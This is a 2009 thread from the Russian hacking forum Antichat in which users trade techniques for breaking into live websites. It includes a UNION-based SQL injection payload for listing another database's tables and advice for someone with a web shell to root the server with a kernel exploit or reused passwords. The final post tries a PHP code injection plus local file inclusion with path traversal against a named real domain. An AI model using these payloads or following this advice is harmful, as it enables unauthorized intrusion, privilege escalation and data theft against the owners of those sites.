ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.06.2009, 14:59
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??
|
|
|
27.06.2009, 15:12
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от GOGA075
вот только у меня 54 БД получилось!!
Так и долдно, или я не туда залез??
туда, легко может быть и намного больше...
|
|
|
|
27.06.2009, 15:13
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Это БД других сайтов рассположенных на данном сервере??
|
|
|
|
27.06.2009, 15:20
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от GOGA075
Это БД других сайтов рассположенных на данном сервере??
скорее всего так, но могут быть и несколько БД на один сайт
|
|
|
|
27.06.2009, 16:19
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
а как правельно создать запрос на перебор тавлиц к другой БД??
|
|
|
|
27.06.2009, 16:37
|
|
Banned
Регистрация: 12.06.2009
Сообщений: 8
Провел на форуме:
26426
Репутация:
1
|
|
имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
|
|
|
|
27.06.2009, 16:38
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802
Репутация:
298
|
|
дефейсы и их обсуждения на ачате запрещено.
|
|
|
|
27.06.2009, 16:39
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от GOGA075
а как правельно создать запрос на перебор тавлиц к другой БД??
?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables+where+table_schema='имя базы'
|
|
|
|
27.06.2009, 17:06
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от Vish
имеется шелл на сайте, но права на все файлы стоят 644, ну вообще везде права граматно расставлены, возможно-ли обойти права и изменить содержимое файла на сервере?
смотри версию ядра, ищи под неё эксплоит и попробуй порутать, либо ищи пассы разные и пробуй их на ftp, ssh...
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
29.06.2009, 00:32
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
Провел на форуме:
596695
Репутация:
19
|
|
Несколько страниц был спор об этом инклуде...у меня вопрос остался
Делаю такой запрос:
http://www.cyl.ru/index.php?lang=ru&page=order2&fcountry=<? system($cmd); ?>
Потом читаю
http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_adda%00
Выдает
cyl_price_rub|i:4880;cyl_price_dollar|i:148;order_ id|N;country|s:19:"<? system($cmd); ?>";countryname|s:6:"Россия";city|N;oplata|N;o plata_price|N;name|N;zip|N;cityname|N;address|N;me tro|N;phone|N;calltime|N;email|N;info|N;the_curren t_page|s:6:"order2";the_previous_page|s:6:"order2" ;the_partner|N;user_id|i:181944214;
Полему при LFI не исполнился php код? Что я сделал не так? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
